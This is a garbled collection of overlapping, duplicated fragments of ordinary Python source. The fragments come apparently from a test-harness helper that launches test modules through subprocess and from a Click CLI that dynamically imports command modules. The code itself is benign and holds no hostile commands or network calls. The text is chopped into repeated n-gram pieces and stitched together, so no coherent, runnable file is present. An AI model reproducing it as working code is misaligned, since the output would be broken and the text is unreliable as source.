self.tmpsize = 0", "def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb')", 
"duration = time.time() - start sleepfor = interval if timeout is not None:", "= os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env,", "= time.time() size = os.path.getsize(path) while size == last_size: duration = time.time() -", "import sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread):", "fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp,", "self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not", "readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if", "= None self.process = None self.tmpfile = None self.tmpsize = 0 self.response =", "interval=0.1): start = time.time() size = os.path.getsize(path) while size == last_size: duration =", "touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd =", "wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with", "size == last_size: duration = time.time() - start sleepfor = interval if timeout", "__init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile = None self.tmpsize", "not None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if", "os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin = None daemon", "None stdin = None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode =", "class 
TestApp(threading.Thread): name = None args = None stdin = None daemon =", "= os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m',", ") self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def", "self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not None and", "name self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize", "= os.path.getsize(path) while size == last_size: duration = time.time() - start sleepfor =", "TestApp(threading.Thread): name = None args = None stdin = None daemon = True", "timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname,", "os.path.getsize(path) while size == last_size: duration = time.time() - start sleepfor = interval", "self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize =", "'timeout waiting for change to file=%s' % (path,)) sleepfor = min(timeout - duration,", "universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self):", "0 self.response = None self.stdout, self.stderr = b'', b'' def start(self, name, args):", "cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally:", "'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def", "start sleepfor = interval if timeout is not None: # pragma: no cover", "subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: 
self.stdout, self.stderr = self.process.communicate(self.stdin)", "super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile:", "self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] =", "with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return", "self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr", "= '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try:", "sleepfor = interval if timeout is not None: # pragma: no cover if", "self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1):", "is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile =", "cover if duration >= timeout: raise RuntimeError( 'timeout waiting for change to file=%s'", "interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def", "cmd = [sys.executable, '-m', 'tests.' 
+ self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile]", "= None self.tmpfile = None self.tmpsize = 0 self.response = None self.stdout, self.stderr", "def start(self, name, args): self.name = name self.args = args or [] fd,", "readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path,", "stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode =", "def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile = None", "open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start =", "self.exitcode = None self.process = None self.tmpfile = None self.tmpsize = 0 self.response", "def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5,", "finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not None and self.exitcode", "'1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout,", "raise RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor = min(timeout", "= None stdin = None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode", "None self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name = name", "os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd", "env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, )", "self.process = None self.tmpfile = None self.tmpsize = 0 
self.response = None self.stdout,", "wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size ==", "start = time.time() size = os.path.getsize(path) while size == last_size: duration = time.time()", "[] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile)", "self.tmpfile = None self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'',", "if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED']", "timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile)", "None self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'', b'' def", "None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None", "os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.'", "self.stderr = b'', b'' def start(self, name, args): self.name = name self.args =", "threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args =", "self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path):", ">= timeout: raise RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor", "if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5,", "run(self): cmd = [sys.executable, '-m', 'tests.' 
+ self.name] if self.tmpfile: cmd += ['--callback-file',", "self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is", "while size == last_size: duration = time.time() - start sleepfor = interval if", "pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout waiting for change", "= self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process is not None", "= None self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name =", "if timeout is not None: # pragma: no cover if duration >= timeout:", "None self.process = None self.tmpfile = None self.tmpsize = 0 self.response = None", "cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd,", "# pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout waiting for", "self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen(", "self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile,", "'tests.' 
+ self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env", "= None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process", "def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def", "time.time() - start sleepfor = interval if timeout is not None: # pragma:", "== last_size: duration = time.time() - start sleepfor = interval if timeout is", "= tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def", "if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change(", "self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile", "name = None args = None stdin = None daemon = True def", "def is_alive(self): return self.process is not None and self.exitcode is None def stop(self):", "open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines()", "with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start", "interval if timeout is not None: # pragma: no cover if duration >=", "self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name = name self.args", "not None: # pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout", "to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size =" ]
[ "for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'):", "class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self): self.verbose", "class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the", "ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list = []", "\"\"\"Logs a message to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg,", "def __init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs a message to", "ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] ==", "\"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported", "2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace')", "get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0]", "\"\"\"Logs a message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def", "2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod =", "self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to import:", "command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically", "enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log", "import importlib import logging import os import sys import click class Context(object): \"\"\"Shared", "log = logging.getLogger(__name__) def list_commands(self, ctx): 
\"\"\"Search through the _commands_ directory for modules", "use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder):", "logging import os import sys import click class Context(object): \"\"\"Shared context object for", "except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return", "import click class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def", "classes.\"\"\" import importlib import logging import os import sys import click class Context(object):", "if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name", "os import sys import click class Context(object): \"\"\"Shared context object for passing information", "if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log =", "the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\"", "[] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in", "return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\"", "import logging import os import sys import click class Context(object): \"\"\"Shared context object", "\"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through", "if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name)", "the _commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join(", "= False def log(self, msg, *args): \"\"\"Logs a message to 
stderr.\"\"\" if args:", "command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command", "name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2:", "directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.',", "try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name)", "not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort()", "stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click", "command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_", "list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list =", "command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found", "only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class", "filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list:", "self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod", "information between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs", "os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename)", "msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to", 
"name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might", "modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename", "SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s incompatible module.',", "self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__)", "for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for", "verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering", "a message to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args)", "command list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules", "self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list)", "self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def", "gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory", "self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s incompatible module.', sys.version_info[0])", "filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name)", "== 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii',", "name = name.encode('ascii', 'replace') mod = 
importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return", "%s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name)", "command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding", "error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python", "def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list", "encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__)", "*args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self,", "command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx, name):", "in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if not", "= filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list:", "os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'):", "context object for passing information between commands.\"\"\" def __init__(self): self.verbose = False def", "to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list", "for passing information between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg,", "list: %s', command_name) 
command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def", "self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import", "to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import:", "detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name),", "through the _commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder =", "FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search", "msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %= args click.echo(msg,", "in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding", "name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except", "passing information between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, *args):", "return mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s',", "False def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg", "args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr only", "to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in", "self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name", "name) name = name.encode('ascii', 'replace') mod = 
importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod)", "%s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to", "= [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file", "for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_", "in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module:", "__init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\"", "except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s incompatible", "commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for", "self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be", "command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx,", "to import: %s', name) self.log.warning('Might be a Python %s incompatible module.', sys.version_info[0]) return", "vlog(self, msg, *args): \"\"\"Logs a message to stderr only if verbose is enabled.\"\"\"", "click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr only if", "to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand):", "if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for", "importlib import logging import os 
import sys import click class Context(object): \"\"\"Shared context", "directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command", "def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if", "import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2", "logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\"", "if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s',", "to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args):", "ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except", "\"\"\"FunCLI classes.\"\"\" import importlib import logging import os import sys import click class", "a message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self,", "return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s", "message to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class", "if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a", "filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s',", "*args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr)", "self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to", "between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, 
*args): \"\"\"Logs a", "mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error)", "Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self): self.verbose =", "message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg,", "__package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to", "mod) return mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error", "self.verbose = False def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if", "directory for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands'))", "ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s',", "\"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python", "filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted", "_commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in", "as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError:", "import os import sys import click class Context(object): \"\"\"Shared context object for passing", "= name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli", "os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in 
os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s',", "'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if", "= logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to", "\"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder", "command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try:", "cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command", "'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError", "importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed", "object for passing information between commands.\"\"\" def __init__(self): self.verbose = False def log(self,", "class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx):", "in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3]", "%s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name)", "log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %= args", "= os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory:", "file in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name =", "*args): \"\"\"Logs a message to stderr only if verbose is 
enabled.\"\"\" if self.verbose:", "msg, *args): \"\"\"Logs a message to stderr only if verbose is enabled.\"\"\" if", "click class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self):", "command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return", "args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message", "stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs", "modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected,", "commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs a message", "%s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the", "sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name =", "sys import click class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\"", "list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in", "mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as", "import sys import click class Context(object): \"\"\"Shared context object for passing information between", "_commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__),", "\"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self): self.verbose = False", "<reponame>e4r7hbug/cli-fun<filename>cli_fun/classes.py<gh_stars>0 \"\"\"FunCLI classes.\"\"\" import importlib import logging import os import sys import click", "filename in 
os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if", "information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a", "module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to import: %s',", "def vlog(self, msg, *args): \"\"\"Logs a message to stderr only if verbose is", "%s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self,", "is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\"", "import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s',", "%= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr", "error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed", "file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr only if verbose", "def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %=", "= importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error:" ]
